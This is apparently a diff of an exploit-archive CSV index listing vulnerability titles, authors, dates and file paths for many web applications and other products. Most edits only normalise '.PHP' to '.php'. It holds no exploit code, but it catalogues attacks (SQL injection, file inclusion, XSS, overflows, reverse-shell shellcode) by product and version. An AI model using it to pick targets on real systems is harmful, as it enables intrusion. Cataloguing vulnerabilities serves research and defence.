View.PHP Viewcategory.PHP Cross-Site Scripting Vulnerability",2006-12-19,Linux_Drox,php,webapps,0 -29300,platforms/php/webapps/29300.txt,"Typo3 3.7/3.8/4.0 Class.TX_RTEHTMLArea_PI1.PHP Multiple Remote Command Execution Vulnerabilities",2006-12-20,"D. Fabian",php,webapps,0 +29298,platforms/php/webapps/29298.txt,"OSTicket 1.2/1.3 Support Cards View.php Cross-Site Scripting Vulnerability",2006-12-19,"Hacker CooL",php,webapps,0 +29299,platforms/php/webapps/29299.txt,"Mini Web Shop 2.1.c View.php Viewcategory.php Cross-Site Scripting Vulnerability",2006-12-19,Linux_Drox,php,webapps,0 +29300,platforms/php/webapps/29300.txt,"Typo3 3.7/3.8/4.0 Class.TX_RTEHTMLArea_PI1.php Multiple Remote Command Execution Vulnerabilities",2006-12-20,"D. Fabian",php,webapps,0 29301,platforms/jsp/webapps/29301.txt,"Oracle Portal 9.0.2 Calendar.JSP Multiple HTTP Response Splitting Vulnerabilities",2006-12-20,"putosoft softputo",jsp,webapps,0 29302,platforms/linux/remote/29302.txt,"Mono XSP 1.x/2.0 Source Code Information Disclosure Vulnerability",2006-12-20,jose.palanco,linux,remote,0 -29303,platforms/php/webapps/29303.txt,"PHPBuilder 0.0.2 HTM2PHP.PHP Directory Traversal Vulnerability",2006-11-08,"the master",php,webapps,0 +29303,platforms/php/webapps/29303.txt,"PHPBuilder 0.0.2 HTM2PHP.php Directory Traversal Vulnerability",2006-11-08,"the master",php,webapps,0 29304,platforms/php/webapps/29304.txt,"Calacode @Mail Webmail 4.51 Filtering Engine HTML Injection Vulnerability",2006-12-20,"Philippe C. Caturegli",php,webapps,0 29292,platforms/windows/webapps/29292.txt,"XAMPP for Windows 1.8.2 - Blind SQL Injection",2013-10-29,"Sebastián Magof",windows,webapps,0 29305,platforms/multiple/dos/29305.txt,"FTPRush 1.0.610 - Host Field Local Buffer Overflow Vulnerability",2006-12-22,"Umesh Wanve",multiple,dos,0 @@ -26338,7 +26338,7 @@ id,file,description,date,author,platform,type,port 29334,platforms/cfm/webapps/29334.txt,"Future Internet index.cfm Multiple Parameter SQL Injection",2006-12-23,Linux_Drox,cfm,webapps,0 29335,platforms/cfm/webapps/29335.txt,"Future Internet index.cfm categoryId Parameter XSS",2006-12-23,Linux_Drox,cfm,webapps,0 29336,platforms/asp/webapps/29336.txt,"Chatwm 1.0 SelGruFra.ASP SQL Injection Vulnerabilities",2006-12-24,ShaFuq31,asp,webapps,0 -29337,platforms/php/webapps/29337.txt,"TimberWolf 1.2.2 ShowNews.PHP Cross-Site Scripting Vulnerability",2006-12-24,CorryL,php,webapps,0 +29337,platforms/php/webapps/29337.txt,"TimberWolf 1.2.2 ShowNews.php Cross-Site Scripting Vulnerability",2006-12-24,CorryL,php,webapps,0 29338,platforms/php/webapps/29338.txt,"VBulletin 3.5.x/3.6.x SWF Script Injection Vulnerability",2006-12-25,"Ashraf Morad",php,webapps,0 29339,platforms/php/webapps/29339.txt,"PHP Live! 3.2.2 setup/transcripts.php search_string Parameter XSS",2006-12-25,"Hackers Center Security",php,webapps,0 29340,platforms/php/webapps/29340.txt,"PHP Live! 3.2.2 index.php l Parameter XSS",2006-12-25,"Hackers Center Security",php,webapps,0 @@ -26354,12 +26354,12 @@ id,file,description,date,author,platform,type,port 29350,platforms/php/webapps/29350.txt,"phpCMS 1.1.7 include/class.search_phpcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 29351,platforms/php/webapps/29351.txt,"phpCMS 1.1.7 include/class.lib_indexer_universal_phpcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 29352,platforms/php/webapps/29352.txt,"phpCMS 1.1.7 include/class.layout_phpcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 -29375,platforms/php/webapps/29375.txt,"Simplog 0.9.3 Archive.PHP SQL Injection Vulnerability",2007-01-02,"Javor Ninov",php,webapps,0 -29376,platforms/php/webapps/29376.txt,"VCard Pro GBrowse.PHP Cross-Site Scripting Vulnerability",2007-01-02,exexp,php,webapps,0 +29375,platforms/php/webapps/29375.txt,"Simplog 0.9.3 Archive.php SQL Injection Vulnerability",2007-01-02,"Javor Ninov",php,webapps,0 +29376,platforms/php/webapps/29376.txt,"VCard Pro GBrowse.php Cross-Site Scripting Vulnerability",2007-01-02,exexp,php,webapps,0 29354,platforms/php/webapps/29354.txt,"pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting Web Vulnerabilities",2013-11-01,Vulnerability-Lab,php,webapps,0 29473,platforms/linux/dos/29473.txt,"Squid Proxy 2.5/2.6 FTP URI Remote Denial of Service Vulnerability",2007-01-16,"David Duncan Ross Palmer",linux,dos,0 29474,platforms/php/webapps/29474.txt,"Scriptme SmE 1.21 File Mailer Login SQL Injection Vulnerability",2007-01-16,CorryL,php,webapps,0 -29356,platforms/php/webapps/29356.txt,"WordPress 1.x/2.0.x - Template.PHP HTML Injection Vulnerability",2006-12-27,"David Kierznowski",php,webapps,0 +29356,platforms/php/webapps/29356.txt,"WordPress 1.x/2.0.x - Template.php HTML Injection Vulnerability",2006-12-27,"David Kierznowski",php,webapps,0 29357,platforms/asp/webapps/29357.txt,"Hosting Controller 7C FolderManager.ASPX Directory Traversal Vulnerability",2006-12-27,KAPDA,asp,webapps,0 29358,platforms/asp/webapps/29358.txt,"DMXReady Secure Login Manager 1.0 login.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0 29359,platforms/asp/webapps/29359.txt,"DMXReady Secure Login Manager 1.0 content.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0 @@ -26398,15 +26398,15 @@ id,file,description,date,author,platform,type,port 29394,platforms/cgi/webapps/29394.txt,"EditTag 1.2 mkpw_mp.cgi plain Parameter XSS",2007-01-05,NetJackal,cgi,webapps,0 29395,platforms/cgi/webapps/29395.txt,"EditTag 1.2 mkpw.pl plain Parameter XSS",2007-01-05,NetJackal,cgi,webapps,0 29396,platforms/cgi/webapps/29396.txt,"EditTag 1.2 mkpw.cgi plain Parameter XSS",2007-01-05,NetJackal,cgi,webapps,0 -29397,platforms/php/webapps/29397.php,"Coppermine Photo Gallery 1.x Albmgr.PHP SQL Injection Vulnerability",2007-01-05,DarkFig,php,webapps,0 +29397,platforms/php/webapps/29397.php,"Coppermine Photo Gallery 1.x Albmgr.php SQL Injection Vulnerability",2007-01-05,DarkFig,php,webapps,0 29398,platforms/asp/webapps/29398.txt,"Shopstorenow E-commerce Shopping Cart Orange.ASP SQL Injection Vulnerability",2007-01-06,IbnuSina,asp,webapps,0 29399,platforms/linux/dos/29399.txt,"Multiple PDF Readers - Multiple Remote Buffer Overflow Vulnerability",2007-01-06,LMH,linux,dos,0 29400,platforms/novell/remote/29400.txt,"Novell Access Manager 3 Identity Server IssueInstant Parameter Cross-Site Scripting Vulnerability",2007-01-08,anonymous,novell,remote,0 29401,platforms/asp/webapps/29401.txt,"CreateAuction Cats.ASP SQL Injection Vulnerability",2007-01-08,IbnuSina,asp,webapps,0 29402,platforms/hardware/dos/29402.txt,"Packeteer PacketShaper 8.0 - Multiple Buffer Overflow Denial of Service Vulnerabilities",2007-01-08,kian.mohageri,hardware,dos,0 29403,platforms/windows/local/29403.txt,"HP Multiple Products PML Driver HPZ12 - Local Privilege Escalation Vulnerability",2007-01-08,Sowhat,windows,local,0 -29404,platforms/php/webapps/29404.txt,"MediaWiki 1.x AJAX Index.PHP Cross-Site Scripting Vulnerability",2007-01-09,"Moshe Ben-Abu",php,webapps,0 -29405,platforms/php/webapps/29405.txt,"PHPKit 1.6.1 Comment.PHP SQL Injection Vulnerability",2007-01-09,yorn,php,webapps,0 +29404,platforms/php/webapps/29404.txt,"MediaWiki 1.x AJAX Index.php Cross-Site Scripting Vulnerability",2007-01-09,"Moshe Ben-Abu",php,webapps,0 +29405,platforms/php/webapps/29405.txt,"PHPKit 1.6.1 Comment.php SQL Injection Vulnerability",2007-01-09,yorn,php,webapps,0 29406,platforms/solaris/dos/29406.c,"Sun Solaris 9 RPC Request Denial of Service Vulnerability",2007-01-09,"Federico L. Bossi Bonin",solaris,dos,0 29407,platforms/php/webapps/29407.txt,"Magic Photo Storage Website - admin/admin_password.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 29408,platforms/php/webapps/29408.txt,"Magic Photo Storage Website - admin/add_welcome_text.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 @@ -26438,11 +26438,11 @@ id,file,description,date,author,platform,type,port 29434,platforms/php/webapps/29434.txt,"Magic Photo Storage Website - user/user_membership_password.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 29435,platforms/multiple/webapps/29435.txt,"Apache Tomcat 5.5.25 - CSRF Vulnerabilities",2013-11-04,"Ivano Binetti",multiple,webapps,0 29436,platforms/hardware/shellcode/29436.asm,"MIPS Little Endian - Reverse Shell Shellcode (Linux)",2013-11-04,"Jacob Holcomb",hardware,shellcode,0 -29437,platforms/php/webapps/29437.txt,"Easy Banner Pro 2.8 info.PHP Remote File Include Vulnerability",2007-01-07,rUnViRuS,php,webapps,0 -29438,platforms/php/webapps/29438.txt,"Edit-X Edit_Address.PHP Remote File Include Vulnerability",2007-01-09,IbnuSina,php,webapps,0 +29437,platforms/php/webapps/29437.txt,"Easy Banner Pro 2.8 info.php Remote File Include Vulnerability",2007-01-07,rUnViRuS,php,webapps,0 +29438,platforms/php/webapps/29438.txt,"Edit-X Edit_Address.php Remote File Include Vulnerability",2007-01-09,IbnuSina,php,webapps,0 29439,platforms/multiple/remote/29439.txt,"iPlanet Web Server 4.1 - Search Module Cross-Site Scripting Vulnerability",2007-01-09,Khalsa,multiple,remote,0 29441,platforms/osx/dos/29441.txt,"Apple Mac OS X 10.4.8 - DMG UFS FFS_MountFS Integer Overflow Vulnerability",2007-01-10,LMH,osx,dos,0 -29442,platforms/php/webapps/29442.html,"phpBB 2.0.21 - Privmsg.PHP HTML Injection Vulnerability",2007-01-11,Demential,php,webapps,0 +29442,platforms/php/webapps/29442.html,"phpBB 2.0.21 - Privmsg.php HTML Injection Vulnerability",2007-01-11,Demential,php,webapps,0 29443,platforms/windows/dos/29443.py,"VideoLan VLC Media Player 0.8.6a Unspecified Denial of Service Vulnerability",2007-01-11,shinnai,windows,dos,0 29444,platforms/windows/dos/29444.pl,"CA BrightStor ARCserve Backup Message Engine/Tape Engine Remote Buffer Overflow Vulnerability",2007-01-11,"Tenable NS",windows,dos,0 29445,platforms/windows/dos/29445.rb,"Hanso Player 2.5.0 - 'm3u' Buffer Overflow (DoS)",2013-11-05,"Necmettin COSKUN",windows,dos,0 @@ -26454,7 +26454,7 @@ id,file,description,date,author,platform,type,port 29450,platforms/php/webapps/29450.txt,"Ezboxx 0.7.6 Beta - Multiple Input Validation Vulnerabilities",2007-01-12,"Doron P",php,webapps,0 29451,platforms/php/webapps/29451.txt,"All In One Control Panel 1.3.x cp_downloads.php did Parameter SQL Injection",2007-01-12,Coloss,php,webapps,0 29452,platforms/osx/dos/29452.txt,"Apple Mac OS X 10.4.8 - DMG UFS UFS_LookUp Denial of Service Vulnerability",2007-01-13,LMH,osx,dos,0 -29453,platforms/php/webapps/29453.php,"PHP-Nuke 7.x Block-Old_Articles.PHP SQL Injection Vulnerability",2007-01-13,Paisterist,php,webapps,0 +29453,platforms/php/webapps/29453.php,"PHP-Nuke 7.x Block-Old_Articles.php SQL Injection Vulnerability",2007-01-13,Paisterist,php,webapps,0 29454,platforms/osx/dos/29454.txt,"Apple Mac OS X 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service Vulnerability",2007-01-13,LMH,osx,dos,0 29455,platforms/windows/dos/29455.py,"RealNetwork RealPlayer 10.5 MID File Handling Remote Denial of Service Vulnerability",2007-01-15,shinnai,windows,dos,0 29456,platforms/asp/webapps/29456.txt,"InstantASP 4.1 Logon.aspx SessionID Parameter XSS",2007-01-15,Doz,asp,webapps,0 @@ -26468,7 +26468,7 @@ id,file,description,date,author,platform,type,port 29461,platforms/osx/dos/29461.txt,"Apple WebKit build 18794 WebCore Remote Denial of Service Vulnerability",2007-01-15,"Tom Ferris",osx,dos,0 29481,platforms/php/webapps/29481.txt,"Indexu 5.0/5.3 sendmail.php Multiple Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 29463,platforms/windows/dos/29463.c,"Ipswitch WS_FTP 2007 Professional WSFTPURL.EXE Local Memory Corruption Vulnerability",2007-01-15,LMH,windows,dos,0 -29464,platforms/php/webapps/29464.txt,"Liens_Dynamiques 2.1 AdminLien.PHP Security Restriction Bypass Vulnerability",2007-01-15,sn0oPy,php,webapps,0 +29464,platforms/php/webapps/29464.txt,"Liens_Dynamiques 2.1 AdminLien.php Security Restriction Bypass Vulnerability",2007-01-15,sn0oPy,php,webapps,0 29465,platforms/windows/local/29465.txt,"Outpost Firewall PRO 4.0 - Local Privilege Escalation Vulnerability",2007-01-15,"Matousec Transparent security",windows,local,0 29466,platforms/php/webapps/29466.txt,"Liens_Dynamiques 2.1 - Multiple Unspecified Cross-Site Scripting Vulnerabilities",2007-01-15,sn0oPy,php,webapps,0 29467,platforms/linux/local/29467.c,"Rixstep Undercover - Local Privilege Escalation Vulnerability",2007-01-15,"Rixstep Pwned",linux,local,0 @@ -26476,7 +26476,7 @@ id,file,description,date,author,platform,type,port 29469,platforms/php/webapps/29469.txt,"Jax Petition 3.06 Book smileys.php languagepack Parameter Local File Inclusion",2007-01-15,"ilker Kandemir",php,webapps,0 29470,platforms/linux/dos/29470.txt,"Oftpd 0.3.7 Unsupported Address Family Remote Denial of Service Vulnerability",2007-01-15,anonymous,linux,dos,0 29471,platforms/linux/remote/29471.txt,"BlueZ 1.x/2.x - HIDD Bluetooh HID Command Injection Vulnerability",2007-11-16,"Collin Mulliner",linux,remote,0 -29472,platforms/php/webapps/29472.txt,"DT_Guestbook 1.0 Index.PHP Cross-Site Scripting Vulnerability",2007-01-16,"Jesper Jurcenoks",php,webapps,0 +29472,platforms/php/webapps/29472.txt,"DT_Guestbook 1.0 Index.php Cross-Site Scripting Vulnerability",2007-01-16,"Jesper Jurcenoks",php,webapps,0 29482,platforms/php/webapps/29482.php,"WordPress Theme Kernel - Remote File Upload Vulnerability",2013-11-07,link_satisi,php,webapps,0 29483,platforms/php/webapps/29483.txt,"Indexu 5.0/5.3 send_pwd.php Multiple Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 29484,platforms/php/webapps/29484.txt,"Indexu 5.0/5.3 - search.php keyword Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 @@ -26488,21 +26488,21 @@ id,file,description,date,author,platform,type,port 29490,platforms/windows/remote/29490.txt,"avm fritz!dsl igd control service 2.2.29 - Directory Traversal information disclosure Vulnerability",2007-01-17,DPR,windows,remote,0 29491,platforms/php/webapps/29491.txt,"myBloggie 2.1.5 index.php PATH_INFO Parameter XSS",2007-01-17,CorryL,php,webapps,0 29492,platforms/php/webapps/29492.txt,"myBloggie 2.1.5 login.php PATH_INFO Parameter XSS",2007-01-17,CorryL,php,webapps,0 -29495,platforms/php/webapps/29495.txt,"Sabros.US 1.7 Index.PHP Cross-Site Scripting Vulnerability",2007-01-18,CorryL,php,webapps,0 +29495,platforms/php/webapps/29495.txt,"Sabros.US 1.7 Index.php Cross-Site Scripting Vulnerability",2007-01-18,CorryL,php,webapps,0 29496,platforms/linux/remote/29496.txt,"ArsDigita Community System 3.4.x - Directory Traversal Vulnerability",2007-01-18,"Elliot Kendall",linux,remote,0 29497,platforms/php/webapps/29497.txt,"Easebay Resources Paypal Subscription Manager Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0 29498,platforms/php/webapps/29498.txt,"Easebay Resources Login Manager Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0 -29499,platforms/php/webapps/29499.txt,"SMF 1.1 Index.PHP HTML Injection Vulnerability",2007-01-20,"Aria-Security Team",php,webapps,0 +29499,platforms/php/webapps/29499.txt,"SMF 1.1 Index.php HTML Injection Vulnerability",2007-01-20,"Aria-Security Team",php,webapps,0 29500,platforms/asp/webapps/29500.txt,"RASPcalendar 1.01 - [ASP] Admin Login Vlunerabilities",2013-11-08,"Hackeri-AL UAH-Crew",asp,webapps,0 29502,platforms/multiple/dos/29502.html,"Transmit 3.5.5 - Remote Heap Overflow Vulnerability",2007-01-20,LMH,multiple,dos,0 29503,platforms/windows/dos/29503.py,"KarjaSoft Sami HTTP Server 1.0.4/1.0.5/2.0.1 Request Remote Denial of Service Vulnerability",2007-01-22,shinnai,windows,dos,0 -29504,platforms/php/webapps/29504.txt,"Unique Ads Banner.PHP SQL Injection Vulnerability",2007-01-22,Linux_Drox,php,webapps,0 +29504,platforms/php/webapps/29504.txt,"Unique Ads Banner.php SQL Injection Vulnerability",2007-01-22,Linux_Drox,php,webapps,0 29505,platforms/php/webapps/29505.txt,"212cafeBoard Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,Linux_Drox,php,webapps,0 29506,platforms/php/webapps/29506.txt,"Bitweaver 1.3.1 Articles and Blogs Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,CorryL,php,webapps,0 -29507,platforms/php/webapps/29507.txt,"212Cafe Guestbook 4.00 Show.PHP Cross-Site Scripting Vulnerability",2007-01-22,Linux_Drox,php,webapps,0 +29507,platforms/php/webapps/29507.txt,"212Cafe Guestbook 4.00 Show.php Cross-Site Scripting Vulnerability",2007-01-22,Linux_Drox,php,webapps,0 29508,platforms/php/webapps/29508.sh,"Vote! Pro 4.0 - Multiple PHP Code Execution Vulnerabilities",2007-01-23,r0ut3r,php,webapps,0 29509,platforms/osx/dos/29509.txt,"Apple Mac OS X 10.4.8 - QuickDraw GetSrcBits32ARGB Remote Memory Corruption Vulnerability",2007-01-23,LMH,osx,dos,0 -30029,platforms/php/webapps/30029.txt,"SonicBB 1.0 - Search.PHP Cross-Site Scripting Vulnerability",2007-05-14,"Jesper Jurcenoks",php,webapps,0 +30029,platforms/php/webapps/30029.txt,"SonicBB 1.0 - Search.php Cross-Site Scripting Vulnerability",2007-05-14,"Jesper Jurcenoks",php,webapps,0 30031,platforms/ios/webapps/30031.txt,"Imagam iFiles 1.16.0 iOS - Multiple Web Vulnerabilities",2013-12-04,Vulnerability-Lab,ios,webapps,0 30032,platforms/windows/local/30032.rb,"Steinberg MyMp3PRO 5.0 - Buffer Overflow/SEH Buffer Overflow/DEP Bypass with ROP",2013-12-04,metacom,windows,local,0 30085,platforms/linux/webapps/30085.txt,"Zimbra - Privilegie Escalation via LFI (0day)",2013-12-06,rubina119,linux,webapps,0 @@ -26511,24 +26511,24 @@ id,file,description,date,author,platform,type,port 30037,platforms/windows/remote/30037.txt,"Caucho Resin 3.1 Encoded Space (%20) Request Path Disclosure",2007-05-15,"Derek Abdine",windows,remote,0 30038,platforms/windows/remote/30038.txt,"Caucho Resin 3.1 \web-inf Traversal Arbitrary File Access",2007-05-15,"Derek Abdine",windows,remote,0 30039,platforms/multiple/local/30039.txt,"Multiple Personal Firewall Products - Local Protection Mechanism Bypass Vulnerability",2007-05-15,"Matousec Transparent security",multiple,local,0 -30040,platforms/php/webapps/30040.txt,"Jetbox CMS 2.1 Email FormMail.PHP Input Validation Vulnerability",2007-05-15,"Jesper Jurcenoks",php,webapps,0 +30040,platforms/php/webapps/30040.txt,"Jetbox CMS 2.1 Email FormMail.php Input Validation Vulnerability",2007-05-15,"Jesper Jurcenoks",php,webapps,0 30041,platforms/php/webapps/30041.txt,"Jetbox CMS 2.1 - view/search/ path Parameter XSS",2007-05-15,"Mikhail Markin",php,webapps,0 30042,platforms/php/webapps/30042.txt,"Jetbox CMS 2.1 - view/supplynews Multiple Parameter XSS",2007-05-15,"Mikhail Markin",php,webapps,0 30043,platforms/linux/remote/30043.txt,"Sun Java JDK 1.x - Multiple Vulnerabilities",2007-05-16,"Chris Evans",linux,remote,0 30045,platforms/windows/remote/30045.html,"PrecisionID Barcode PrecisionID_Barcode.DLL ActiveX 1.9 Control Arbitrary File Overwrite Vulnerability",2007-05-16,shinnai,windows,remote,0 30046,platforms/windows/dos/30046.py,"Computer Associates BrightStor ARCserve Backup <= 11.5 mediasvr caloggerd Denial of Service Vulnerabilities",2007-05-16,"M. Shirk",windows,dos,0 -30047,platforms/php/webapps/30047.txt,"VBulletin <= 3.6.6 Calendar.PHP HTML Injection Vulnerability",2007-05-16,"laurent gaffie",php,webapps,0 +30047,platforms/php/webapps/30047.txt,"VBulletin <= 3.6.6 Calendar.php HTML Injection Vulnerability",2007-05-16,"laurent gaffie",php,webapps,0 30048,platforms/asp/webapps/30048.html,"VP-ASP Shopping Cart 6.50 ShopContent.ASP Cross-Site Scripting Vulnerability",2007-05-17,"John Martinelli",asp,webapps,0 30049,platforms/windows/remote/30049.html,"LEADTOOLS Multimedia 15 - 'Ltmm15.dll' ActiveX Control Stack Buffer Overflow Vulnerability",2007-05-17,shinnai,windows,remote,0 30050,platforms/php/webapps/30050.html,"Redoable 1.2 Theme header.php s Parameter XSS",2007-05-17,"John Martinelli",php,webapps,0 -30051,platforms/php/webapps/30051.txt,"PsychoStats <= 2.3 - Server.PHP Path Disclosure Vulnerability",2007-05-17,kefka,php,webapps,0 +30051,platforms/php/webapps/30051.txt,"PsychoStats <= 2.3 - Server.php Path Disclosure Vulnerability",2007-05-17,kefka,php,webapps,0 30052,platforms/multiple/remote/30052.txt,"Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"Ferruh Mavituna",multiple,remote,0 -30053,platforms/php/webapps/30053.txt,"ClientExec 3.0 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps,0 +30053,platforms/php/webapps/30053.txt,"ClientExec 3.0 Index.php Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps,0 30054,platforms/jsp/webapps/30054.txt,"Sonicwall Gms 7.x - Filter Bypass & Persistent Vulnerability (0Day)",2013-12-05,Vulnerability-Lab,jsp,webapps,0 30055,platforms/ios/webapps/30055.txt,"Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities",2013-12-05,Vulnerability-Lab,ios,webapps,0 -30201,platforms/php/webapps/30201.txt,"Fuzzylime 1.0 Low.PHP Cross-Site Scripting Vulnerability",2007-06-18,RMx,php,webapps,0 +30201,platforms/php/webapps/30201.txt,"Fuzzylime 1.0 Low.php Cross-Site Scripting Vulnerability",2007-06-18,RMx,php,webapps,0 30156,platforms/cgi/webapps/30156.txt,"CGILua <= 3.0 - SQL Injection",2013-12-09,"aceeeeeeeer .",cgi,webapps,0 -30200,platforms/php/webapps/30200.txt,"PHP Hosting Biller 1.0 Index.PHP Cross-Site Scripting Vulnerability",2007-08-18,Serapis.net,php,webapps,0 +30200,platforms/php/webapps/30200.txt,"PHP Hosting Biller 1.0 Index.php Cross-Site Scripting Vulnerability",2007-08-18,Serapis.net,php,webapps,0 30015,platforms/php/webapps/30015.txt,"Advanced Guestbook 2.4.2 Lang Cookie Parameter Local File Include Vulnerability",2007-05-08,netVigilance,php,webapps,0 30016,platforms/windows/remote/30016.txt,"Adobe RoboHelp Frameset-7.HTML Cross-Site Scripting Vulnerability",2007-05-08,"Michael Domberg",windows,remote,0 30017,platforms/unix/local/30017.sh,"HP Tru64 5.0.1 - DOP Command Local Privilege Escalation Vulnerability",2007-05-08,"Daniele Calore",unix,local,0 @@ -26536,7 +26536,7 @@ id,file,description,date,author,platform,type,port 30019,platforms/windows/remote/30019.c,"CA Multiple Products Console Server and InoCore.dll - Remote Code Execution Vulnerabilities",2007-05-09,binagres,windows,remote,0 30020,platforms/linux/dos/30020.txt,"MySQL 5.0.x - IF Query Handling Remote Denial of Service Vulnerability",2013-12-04,"Neil Kettle",linux,dos,0 30021,platforms/solaris/local/30021.txt,"Sun Microsystems Solaris SRSEXEC 3.2.x - Arbitrary File Read Local Information Disclosure Vulnerability",2007-05-10,anonymous,solaris,local,0 -30022,platforms/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 Configure_Plugin.TPL.PHP Cross-Site Scripting Vulnerability",2007-05-10,the_Edit0r,php,webapps,0 +30022,platforms/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 Configure_Plugin.TPL.php Cross-Site Scripting Vulnerability",2007-05-10,the_Edit0r,php,webapps,0 30023,platforms/windows/dos/30023.txt,"Progress OpenEdge 10 b - Multiple Denial of Service Vulnerabilities",2007-05-11,"Eelko Neven",windows,dos,0 30024,platforms/linux/dos/30024.txt,"LibEXIF 0.6.x - Exif_Data_Load_Data_Entry Remote Integer Overflow Vulnerability",2007-05-11,"Victor Stinner",linux,dos,0 30025,platforms/multiple/remote/30025.txt,"TeamSpeak Server 2.0.23 - Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-11,"Gilberto Ficara",multiple,remote,0 @@ -26560,24 +26560,25 @@ id,file,description,date,author,platform,type,port 29547,platforms/windows/local/29547.rb,"VideoSpirit Pro 1.90 - (SEH) Buffer Overflow",2013-11-12,metacom,windows,local,0 29527,platforms/linux/remote/29527.pl,"Xine 0.99.4 M3U Remote Format String Vulnerability",2007-01-03,"Kevin Finisterre",linux,remote,0 29528,platforms/php/local/29528.txt,"PHP 5.2 - FOpen Safe_Mode Restriction-Bypass Vulnerability",2007-01-26,"Maksymilian Arciemowicz",php,local,0 -29529,platforms/php/webapps/29529.txt,"PHP Membership Manager 1.5 Admin.PHP Cross-Site Scripting Vulnerability",2007-01-26,Doz,php,webapps,0 +29529,platforms/php/webapps/29529.txt,"PHP Membership Manager 1.5 Admin.php Cross-Site Scripting Vulnerability",2007-01-26,Doz,php,webapps,0 29530,platforms/php/webapps/29530.txt,"FD Script 1.3.x FName Parameter Information Disclosure Vulnerability",2007-01-26,ajann,php,webapps,0 29531,platforms/windows/dos/29531.txt,"Yahoo! Messenger <= 8.0 Notification Message HTML Injection Vulnerability",2007-01-26,"Hai Nam Luke",windows,dos,0 29532,platforms/osx/dos/29532.txt,"Apple Installer Package 2.1.5 Filename Format String Vulnerability",2007-01-27,LMH,osx,dos,0 29533,platforms/asp/webapps/29533.html,"AdMentor Admin Login SQL Injection Vulnerability",2007-01-27,Cr@zy_King,asp,webapps,0 -29534,platforms/php/webapps/29534.txt,"SpoonLabs Vivvo Article Management CMS 3.40 Show_Webfeed.PHP SQL Injection Vulnerability",2007-01-27,St[at]rExT,php,webapps,0 +29534,platforms/php/webapps/29534.txt,"SpoonLabs Vivvo Article Management CMS 3.40 Show_Webfeed.php SQL Injection Vulnerability",2007-01-27,St[at]rExT,php,webapps,0 29535,platforms/osx/dos/29535.txt,"Telestream Flip4Mac - 'WMV' File Remote Memory Corruption Vulnerability",2007-01-27,kf,osx,dos,0 29536,platforms/windows/dos/29536.html,"Microsoft Internet Explorer 5.0.1 - Multiple ActiveX Controls Denial of Service Vulnerabilities",2007-01-29,"Alexander Sotirov",windows,dos,0 -29537,platforms/php/webapps/29537.txt,"MDPro 1.0.76 Index.PHP SQL Injection Vulnerability",2007-01-27,adexior,php,webapps,0 +29537,platforms/php/webapps/29537.txt,"MDPro 1.0.76 Index.php SQL Injection Vulnerability",2007-01-27,adexior,php,webapps,0 29538,platforms/windows/remote/29538.c,"SSC DiskAccess NFS Client DAPCNFSD.DLL Stack Buffer Overflow Vulnerability",2007-01-29,"Andres Tarasco Acuna",windows,remote,0 29539,platforms/php/webapps/29539.txt,"EncapsCMS 0.3.6 - 'common_foot.php' Remote File Include Vulnerability",2007-01-30,Tr_ZiNDaN,php,webapps,0 29540,platforms/solaris/dos/29540.c,"Sun Solaris 10 ICMP Unspecified Remote Denial of Service Vulnerability",2007-01-30,kcope,solaris,dos,0 -29677,platforms/php/webapps/29677.txt,"Audins Audiens 3.3 setup.php PATH_INFO Parameter XSS",2007-02-26,R00t[ATI],php,webapps,0 -29678,platforms/php/webapps/29678.txt,"Audins Audiens 3.3 system/index.php Cookie PHPSESSID Parameter SQL Injection",2007-02-26,R00t[ATI],php,webapps,0 -29679,platforms/php/webapps/29679.html,"PHPBB2 Admin_Ug_Auth.PHP Administrative Security Bypass Vulnerability",2007-02-26,"Hasadya Raed",php,webapps,0 -29680,platforms/php/webapps/29680.html,"SQLiteManager 1.2 Main.PHP Multiple HTML Injection Vulnerabilities",2007-02-26,"Simon Bonnard",php,webapps,0 -29681,platforms/php/webapps/29681.txt,"Pagesetter 6.2/6.3.0 index.PHP Local File Include Vulnerability",2007-02-26,"D. Matscheko",php,webapps,0 -29682,platforms/php/webapps/29682.txt,"WordPress 2.1.1 - Post.PHP Cross-Site Scripting Vulnerability",2007-02-26,Samenspender,php,webapps,0 +29677,platforms/php/webapps/29677.txt,"Audins Audiens 3.3 setup.php PATH_INFO Parameter XSS",2007-02-26,r00t,php,webapps,0 +39839,platforms/osx/dos/39839.txt,"Apple Quicktime - MOV File Parsing Memory Corruption Vulnerability",2016-05-19,"Francis Provencher",osx,dos,0 +29678,platforms/php/webapps/29678.txt,"Audins Audiens 3.3 system/index.php Cookie PHPSESSID Parameter SQL Injection",2007-02-26,r00t,php,webapps,0 +29679,platforms/php/webapps/29679.html,"PHPBB2 Admin_Ug_Auth.php Administrative Security Bypass Vulnerability",2007-02-26,"Hasadya Raed",php,webapps,0 +29680,platforms/php/webapps/29680.html,"SQLiteManager 1.2 Main.php Multiple HTML Injection Vulnerabilities",2007-02-26,"Simon Bonnard",php,webapps,0 +29681,platforms/php/webapps/29681.txt,"Pagesetter 6.2/6.3.0 